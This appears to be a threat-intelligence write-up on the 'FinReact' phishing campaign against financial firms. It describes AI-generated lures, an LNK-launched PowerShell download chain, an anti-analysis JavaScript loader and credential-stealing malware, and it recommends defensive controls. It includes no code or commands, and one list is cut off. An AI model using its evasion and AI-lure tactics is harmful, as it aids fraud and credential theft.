Security researchers at Proofpoint have identified a sophisticated, large-scale phishing campaign, 'FinReact', targeting the financial services sector. This operation is notable for its use of generative AI to craft highly convincing and personalized email lures, making them difficult to detect. The campaign's goal is to deploy information-stealing malware, such as Vidar and IcedID, by tricking victims into executing a malicious LNK file. This triggers a multi-stage infection process involving a new, evasive JavaScript loader named GhostScript. The campaign demonstrates a significant evolution in the tactics of financially motivated cybercriminals.
The 'FinReact' campaign represents a significant step up in the quality of phishing attacks. By leveraging generative AI, the attackers can create emails that are grammatically perfect, contextually relevant, and personalized to the target, often appearing as a reply to an existing email thread.
The GhostScript loader is a key component of this campaign. It is a novel piece of malware designed for evasion. Its ability to check for virtualized environments before proceeding makes it difficult for automated analysis systems to detonate and study the final payload. This ensures the attackers' more valuable malware (the info-stealers) are only exposed in real victim environments.
The use of AI for lure creation is the other major innovation. This allows the attackers to scale their operation without sacrificing quality, producing thousands of unique, high-quality phishing emails that can bypass reputation-based and signature-based email security filters.
T1566.001 - Spearphishing Attachment - The ZIP file attached to the email.T1204.002 - Malicious File - The user is tricked into clicking the LNK file.T1059.001 - PowerShell - The LNK file executes a PowerShell download cradle.T1622 - Debugger Evasion - The GhostScript loader performs anti-analysis checks.T1059.007 - JavaScript - The GhostScript loader itself is JavaScript-based.T1555 - Credentials from Password Stores - The final payload (Vidar/IcedID) steals credentials from browsers and other applications.A successful compromise can have significant financial and operational consequences for the targeted firms:
Process Analysis is key here.Training users to recognize phishing indicators, especially those involving unusual attachments like password-protected ZIPs, is the first line of defense.
Using Attack Surface Reduction (ASR) rules or application control to block the execution of scripts and LNK files from email can prevent the infection chain from starting.
Modern EDR/AV solutions with behavioral analysis can detect and block suspicious activities like a LNK file launching PowerShell to download a payload.
Email gateways should be configured to scan and potentially block or quarantine password-protected archives, which are a common malware delivery technique.
Given the use of sophisticated AI-generated lures, technical controls alone may not be sufficient. A robust, ongoing security awareness training program is essential. For the financial sector employees targeted by FinReact, this training should specifically focus on the TTP of receiving password-protected ZIP files with the password in the email body. Phishing simulations that mimic this exact technique should be conducted regularly to condition users to recognize and report such emails rather than opening the attachments. A well-trained user is the most effective sensor for detecting high-quality phishing attempts.
Implement application control policies to prevent the execution of unexpected scripts and files. Specifically, configure Windows Attack Surface Reduction (ASR) rules to block the execution of LNK files and to prevent scripts from launching downloaded content. For example, the ASR rule 'Block execution of potentially obfuscated scripts' can interfere with the GhostScript loader. A more stringent approach is to use a tool like AppLocker to deny the execution of LNK files and scripts from user-writable locations like the Downloads folder or AppData, which would break the FinReact infection chain at its earliest stage.
Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) across all endpoints via Group Policy. The FinReact campaign uses a malicious LNK file to launch a PowerShell download cradle. While the initial command might be simple, detailed logging will capture the full content of any de-obfuscated scripts or further commands executed in memory. This provides invaluable forensic data for incident response and can be fed into a SIEM to create high-fidelity alerts for suspicious PowerShell activity, such as download cradles or anti-analysis checks.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats
Every tactic, technique, and sub-technique used in this threat has been identified and mapped to the MITRE ATT&CK framework for consistent, actionable threat language.
Observables and indicators of compromise (IOCs) have been extracted and cataloged. Risk has been assessed and correlated with known threat actors and historical campaigns.
Detection rules, incident response steps, and D3FEND-aligned mitigation strategies are included so your team can act on this intelligence immediately.
Structured threat data is packaged as a STIX 2.1 bundle and can be visualized as an interactive graph — relationships between actors, malware, techniques, and indicators.
Sigma detection rules are derived from the threat techniques in this article and can be converted for deployment across any major SIEM or EDR platform.